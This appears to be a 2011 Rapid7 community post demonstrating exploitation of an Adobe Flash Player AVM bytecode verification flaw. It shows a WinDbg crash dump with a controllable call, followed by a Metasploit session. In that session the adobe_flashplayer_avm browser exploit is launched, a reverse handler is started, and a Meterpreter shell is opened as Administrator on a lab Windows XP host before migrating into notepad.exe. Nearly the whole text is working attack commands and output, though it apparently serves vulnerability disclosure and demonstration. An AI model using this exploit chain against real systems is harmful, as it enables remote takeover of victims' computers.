(fb4.9a0): Access violation - code c0000005 (!!! second chance !!!)
eax=02b38c89 ebx=02b46b20 ecx=02b78040 edx=40027f2b esi=02b467c0 edi=02b5d1f0
eip=02b7558e esp=0013e0e8 ebp=0013e180 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040202
02b7558e 8b4a70 mov ecx,dword ptr [edx+70h]
ds:0023:40027f9b=????????
0:000> dd eax+8
02b38c91 40027f2b 21029780 0002b36d e8180000
02b38ca1 01026d56 34800041 000263d9 08000000
02b38cb1 0a000000 e8000000 01026d56 43800042
02b38cc1 000263d9 05000000 0a000000 e8000000
02b38cd1 01026d56 58800043 000263d9 0c000000
02b38ce1 0a000000 e8000000 01026d56 7a800044
02b38cf1 000263d9 06000000 0a000000 e8000000
02b38d01 01026d56 9c800045 000263d9 08000000
0:000> u eip
02b7558e 8b4a70 mov ecx,dword ptr [edx+70h]
02b75591 8d559c lea edx,[ebp-64h]
02b75594 89459c mov dword ptr [ebp-64h],eax
02b75597 8b01 mov eax,dword ptr [ecx]
02b75599 52 push edx
02b7559a 6a00 push 0
02b7559c 51 push ecx
02b7559d ffd0 call eax
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 672 exploits - 345 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12149 updated today (2011.03.26)
msf > use exploit/windows/browser/adobe_flashplayer_avm
msf exploit(adobe_flashplayer_avm) > set URIPATH /
URIPATH => /
msf exploit(adobe_flashplayer_avm) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.108:4444
[*] Using URL: http://0.0.0.0:8080/
msf exploit(adobe_flashplayer_avm) >
[*] Local IP: http://192.168.0.108:8080/
[*] Server started.
[*] Sending Adobe Flash Player AVM Bytecode Verification Vulnerability HTML to 192.168.0.102:3646
[*] Sending Exploit SWF
[*] Sending stage (749056 bytes) to 192.168.0.102
[*] Meterpreter session 1 opened (192.168.0.108:4444 -> 192.168.0.102:3648) at 2011-03-26 15:23:18 -0400
[*] Session ID 1 (192.168.0.108:4444 -> 192.168.0.102:3648) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2376)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 4092
[*] New server process: notepad.exe (4092)
msf exploit(adobe_flashplayer_avm) > sessions
Active sessions
===============
Id Type Information Connection
-- ------- ---------------- ----------------
1 meterpreter x86/win32 WXPPROSP2-001\Administrator @ WXPPROSP2-001 192.168.0.108:4444 -> 192.168.0.102:3648
rapid7@sgaur.hosted.jivesoftware.com 26 Mar, 2011